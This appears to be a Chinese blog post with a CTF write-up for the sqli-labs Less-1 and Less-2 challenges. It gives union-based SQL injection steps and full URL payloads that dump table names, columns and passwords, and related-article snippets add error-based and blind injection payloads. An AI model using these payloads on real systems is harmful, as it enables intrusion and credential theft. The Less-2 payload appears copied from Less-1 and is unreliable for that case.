buuoj--sqlilabs

最新推荐文章于 2024-03-21 09:47:50 发布
最新推荐文章于 2024-03-21 09:47:50 发布
阅读量910 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_30270815/article/details/114842265
版权
本文详细介绍了在buuoj平台上的sqlilabs练习,通过GET方式解决不同类型的SQL注入问题,包括Error based、Double Injection、Blind等方法,涉及单引号、双引号、报错信息利用、数据库表和列名探测等技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CTF

SQL注入

从2021年3月20日开始做buuoj,解决sql注入问题。

less1 GET - Error based - Single quotes - String

思路
1,使用字符‘进行判断,看是否有报错。
2,猜测列行,’ 后面加 union select 1,2,3#探测行数,并注意观察回显位置。可以对字符做url编码
3,使用union select 1,(select group_concat(table_name) from information_schema.tables),3# 查询出所有表名
4,使用union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘想要的表名’),3# 查询出所有需要表的列名,然后再找出flag

http://localhost/sqli-labs/Less-1/?id=-1’ or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 1,1 --+

less 2 GET - Error based - Intiger based

1,使用字符‘进行判断,看是否有报错。
2,猜测列行,’ 后面加 union select 1,2,3#探测行数,并注意观察回显位置。可以对字符做url编码。但此时仍然报错,尝试使用不存在的id读数据,在后面使用union select,发现回显,可以用。
3,使用union select 1,(select group_concat(table_name) from information_schema.tables),3# 查询出所有表名
4,使用union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘想要的表名’),3# 查询出所有需要表的列名,然后再找出flag

http://localhost/sqli-labs/Less-1/?id=-1’ or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users

最低0.47元/天 解锁文章
buu sqli-labs 【basic】
weixin_52942048的博客
10-07 204
打开链接,需要跳2次才到这个题目页面!!!
SQLI-LABS Less-7 到 Less-8
Web学习之路
03-20 369
布尔盲注
BUUOJ-sqli_labs做题笔记
qq_52988674的博客
08-30 591
less-1 基于错误的单引号字符串 Please input the ID as parameter with numeric value根据该提示在url输入?id=1,可以看到回显正常,试着加一个单引号,页面报错 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LI
BUUOJ
zbbjya的博客
01-04 150
点击我们会看到网址栏哪里有一个/?file=flag.php 说明flag就在PHP的文件当中而现在我们没有看见flag 我们可以用、 页面跳转 变化了 然后你就会得到这样的数据 这样就会得到flag了
buuoj [极客大挑战 2019]LoveSQL
pondzhang的专栏
04-03 413
报错注入: http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select user()))) and '1&password=67df2765f3da545f03860281ef7f964d http:...
buuoj-相册
bunner_的博客
01-17 365
解题 拿到手解压后是一个apk文件,扔到 jeb 中 根据题目提示,拿到完整邮箱即可,以及查看cn包下的文件名,用字符串搜索mail 【ctrl+F】 从上图中可以发现一个名为sendMailByJavaMail的函数,用快捷键q来看看源码 从上图发现v1.set_to(new String[](arg6)),该代码意为将arg6设置为邮件接收者,所以我们需要寻找调用该函数的代码【右键该函数,单击Cross references】 进入MainTask查看 发现第一个参数为C2.MAILSE
BUUCTF/sqli-labs 1-23关
最新发布
weixin_44041994的博客
03-21 1840
因为#号后面都被注释了。这关输入正确用户名密码后,页面显示的不再是User-Agent,而是变成了Refer,我们通过抓包更改Refer,发现和18关差不多,只不过18关有3个参数,而19关只有两个参数。上面提示让我们使用outfile,outfile是sql的语法,可以通过into outfile命令,将查询到的结果写入目标路径,在知道目标系统的绝对路径时可以使用,如。这关通过测试,发现无论sql语句正确与否,返回的信息都是一样的,这样就不符合布尔注入的前提了,布尔盲注只适用于正确与错误结果不同的情况。
sqli-labs Less-8(布尔盲注)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 728
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
BUUOJ Fakebook
沐目的博客
10-22 622
关于源码泄露,我是真的懂的不多,而且刚开始发现有SQL注入,我以为就没了,但最后发现根本不是。 1.源码泄露 这题的关键点,就是找到源码,而找源码,就需要有好的工具(nikto)。存在robots.txt文件,里面有源码的路径。而再用御剑,发现falg.php文件。啥时候可以有一个完美的扫描工具。这还得扫两遍,谁能想的到! <?php class UserInfo { public...
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 592
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
[BUUOJ]两道简单的SQL注入(EasySQL与LoveSQL)
Y4tacker的博客
07-29 7834
文章目录EasySQLLoveSQL 前言:有时候使用#符号会没用,可以用url编码代替%23,基础注入与报错注入都可以解除来这两道题,判断是否为字符型懒得记录下来 EasySQL 通过order by得到有3列 /check.php?username=1' union select 4,2,3%23&password=1 得到回显点位为2和3,查询当前数据库名及版本 开始爆表 /check.php?username=1' union select 1,2,group_concat(table_n
Sqli-Labs~1 详解
Cy610610的博客
12-04 1964
sqli-labs第一关,手把手教学,包学包会!内含informations_schema数据库解释说明等相关内容
BUUOJ[FlareOn4]IgniteMe
阿東啊、
12-07 501
[FlareOn4]IgniteMe
buuoj-随便注
读万卷书,行万里路。
01-22 988
随便注 首先,使用 1'进行测试,判断是否存在 SQL 注入。从返回的结果可以看出,可能存在 SQL 注入 使用 1'可以将 SQL 语句构造成 select * from table where id='1'' limit 0,1。不符合 SQL 语句,所以会导致报错。 使用截断语句 1' #进行截断处理,使得后面的限制语句失效(limit或者其他)。1’ #,而不是1 # 类似的截断语句还...
buuoj [网鼎杯 2020 青龙组] AreUSerialz
会下雪的晴天
09-23 470
复现地址:https://buuoj.cn/ 拖了这么久才看网鼎杯。。这就是菜的原因吧 目录[网鼎杯 2020 青龙组]AreUSerialz [网鼎杯 2020 青龙组]AreUSerialz 知识点:代码审计 打开就是代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protect.
【CTF日记】BUUOJ
CH3UHX9
03-11 821
[HCTF 2018]WarmUp 题目介绍 这道题来自BUUCTF,传送门。 涉及的知识点包括: PHP代码审计 远程文件包含 题目代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"
sql注入合集-buuoj
~airrudder~
08-02 1225
文章目录[极客大挑战 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL[极客大挑战 2019]HardSQL[极客大挑战 2019]FinalSQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[CISCN2019 华北赛区 Day2 Web1]Hack World[GXYCTF2019]BabySQli[Black Watch 入群题]Web[网鼎杯 2018]Fakebook[网鼎杯2018]Unfinish[网鼎杯 2018]Com
buuoj pwn
FFY's Blog
10-07 1149
ret2text rip pwntools gdb 调试 gdb.debug(’./xxx’) pause() 在弹出窗口设好断点,用 python 传递不可打印字符 堆栈平衡,简单溢出 from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(
Buuoj CTF Day01
qq_30015381的博客
12-20 157
Buuoj CTF Day01
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值